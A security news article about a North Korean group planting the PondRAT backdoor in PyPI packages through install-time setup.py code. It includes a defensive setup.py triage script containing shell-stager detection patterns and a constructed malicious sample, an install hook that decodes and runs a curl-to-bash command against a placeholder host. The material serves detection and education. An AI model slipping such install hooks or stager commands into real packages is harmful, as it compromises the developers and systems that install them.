
Citrine Sleet Uses Mac & Linux Malware to Poison PyPI Packages


A North Korean threat group has once again made headlines for its cyber tactics. The group, tracked as Gleaming Pisces by Palo Alto Networks' Unit 42 and as Citrine Sleet by Microsoft, has been caught hiding remote access malware inside open source Python packages built for macOS and Linux systems.

North Korea's advanced persistent threat (APT) groups have gained notoriety for a wide range of attack methods over the years. From cryptocurrency theft to supply chain attacks, these actors have shown considerable creativity. One of their recurring strategies is to trick victims into running malware themselves, whether through fake job recruitment schemes or through poisoned open source repositories.

Gleaming Pisces, linked to the DPRK Reconnaissance General Bureau (RGB), has been active since at least 2018 and is primarily financially motivated. The group is known for standing up fake cryptocurrency platforms to lure victims into handing over sensitive information or installing malicious software. Unit 42 recently revealed that Gleaming Pisces was behind malicious packages uploaded to the Python Package Index (PyPI) earlier this year; the packages have since been removed.

The packages Gleaming Pisces uploaded to PyPI looked innocuous at first glance but carried hidden code that ran at installation time, not on import: pip builds a source distribution by executing its setup.py, so simply installing the package was enough to trigger it. That code ran bash commands that fetched and installed a remote access trojan known as "PondRAT" on the victim's system. PondRAT is a lightweight backdoor with a basic feature set: uploading and downloading files, executing commands, and checking the status of the infected machine.

What sets this campaign apart is that the payloads were built for macOS and Linux only, skipping the far more common Windows target. That choice fits Gleaming Pisces' focus on developers, CI/CD infrastructure and developer workstations, where macOS and Linux dominate. Tailoring the malware to those platforms raises the odds of landing inside the environments the group actually wants.

The poisoned PyPI packages are a reminder that developers need to treat package installs with the same suspicion as phishing links and unsolicited downloads. Few developers pull an obscure package from PyPI by hand, but such packages arrive anyway as transitive dependencies of larger projects, and installing a source distribution runs that package's setup.py with the installing user's privileges. Security experts recommend scanning packages before use, keeping the dependency tree small, and following the latest reporting. In practice that means pinning dependencies with hashes (pip's --require-hashes mode), preferring prebuilt wheels (--only-binary=:all:) so that no setup.py runs at all, and reviewing what a new dependency does at install time before letting it into a build.
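The install-time mechanism described above, and the advice to scan packages before use, as an added example that is not part of the article or of Unit 42's reporting: a small static triage of a setup.py that flags the constructs a stager of this shape needs, namely shell or exec calls, base64 blobs that decode to shell, custom setuptools command classes and a cmdclass registration. Both setup.py samples inside it are constructed for illustration, the stager URL is a non-resolving placeholder, and the samples are only parsed, never executed.

```python
"""Static triage of a setup.py for install-time code execution (added example)."""
import ast
import base64
import re

# Calls that execute code or shell while setup.py itself is being evaluated.
SUSPICIOUS_CALLS = {
    "os.system", "os.popen", "subprocess.run", "subprocess.call",
    "subprocess.check_call", "subprocess.check_output", "subprocess.Popen",
    "exec", "eval", "base64.b64decode", "urllib.request.urlopen",
}
HOOKABLE_COMMANDS = {"install", "develop", "egg_info", "build_py", "build_ext"}
# Shell fragments typical of a download-and-run stager.
SHELL_PATTERN = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b|chmod\s+\+x|/tmp/", re.S)


def _dotted_name(node):
    """Return 'a.b.c' for a Name/Attribute chain, None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        return ".".join(reversed(parts + [node.id]))
    return None


def _import_aliases(tree):
    """Map each locally bound import name to its fully qualified path."""
    aliases = {}
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for a in node.names:
                top = a.name.split(".")[0]
                aliases[a.asname or top] = a.name if a.asname else top
        elif isinstance(node, ast.ImportFrom):
            for a in node.names:
                aliases[a.asname or a.name] = f"{node.module or ''}.{a.name}".lstrip(".")
    return aliases


def _resolve(name, aliases):
    head, dot, rest = name.partition(".")
    return aliases.get(head, head) + dot + rest


def triage_setup_py(source):
    """Return findings as 'line N: ...' strings, sorted by line number."""
    tree = ast.parse(source)
    aliases = _import_aliases(tree)
    findings = []
    for node in ast.walk(tree):
        if isinstance(node, ast.ClassDef):
            bases = {_resolve(b, aliases).rsplit(".", 1)[-1]
                     for b in map(_dotted_name, node.bases) if b}
            for cmd in sorted(bases & HOOKABLE_COMMANDS):
                findings.append((node.lineno, f"custom {cmd} command class {node.name}"))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if SHELL_PATTERN.search(node.value):
                findings.append((node.lineno, f"shell stager string {node.value!r}"))
        elif isinstance(node, ast.Call) and (name := _dotted_name(node.func)):
            full = _resolve(name, aliases)
            if full in SUSPICIOUS_CALLS:
                findings.append((node.lineno, f"call to {full}()"))
            if full == "base64.b64decode" and node.args and isinstance(node.args[0], ast.Constant):
                try:  # look through one layer of base64, the usual obfuscation
                    decoded = base64.b64decode(node.args[0].value).decode("utf-8", "replace")
                except (TypeError, ValueError):  # binascii.Error is a ValueError
                    decoded = ""
                if SHELL_PATTERN.search(decoded):
                    findings.append((node.lineno, f"base64-encoded shell stager {decoded!r}"))
            if full.rsplit(".", 1)[-1] == "setup" and any(k.arg == "cmdclass" for k in node.keywords):
                findings.append((node.lineno, "setup() registers cmdclass install hooks"))
    return [f"line {n}: {msg}" for n, msg in sorted(findings)]


# Constructed sample 1: an ordinary setup.py with no install-time side effects.
BENIGN_SETUP = '''
from setuptools import setup, find_packages
setup(name="example-lib", version="1.0.0", packages=find_packages())
'''

# Constructed sample 2: the PondRAT-style shape, a cmdclass hook that decodes and
# runs a shell stager at install time.  Parsed only; the URL does not resolve.
STAGER_CMD = "curl -s http://example.invalid/p | bash"
STAGER_SETUP = f'''
import base64
import subprocess
from setuptools import setup
from setuptools.command.install import install

class PostInstall(install):
    def run(self):
        install.run(self)
        cmd = base64.b64decode("{base64.b64encode(STAGER_CMD.encode()).decode()}").decode()
        subprocess.run(cmd, shell=True)

setup(name="example-text", version="0.1", cmdclass=dict(install=PostInstall))
'''
```

Running triage_setup_py(STAGER_SETUP) reports the custom install class, the base64 blob that decodes to a curl-to-bash pipeline, the subprocess call and the cmdclass registration, each with its line number; triage_setup_py(BENIGN_SETUP) returns an empty list. Treat the output as a triage aid rather than a verdict: packages that use pyproject.toml build backends, native extensions or legitimate post-install steps still need a human look, and an attacker can just as easily move the payload into a module that runs on first import.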

As Louis Lang, co-founder and CTO of Phylum, aptly puts it, "you're one update away from malware." In an increasingly interconnected software ecosystem, staying informed and acting early is the only real defence against actors like Gleaming Pisces, and developers and organizations need to treat dependency hygiene as a security control rather than an afterthought.
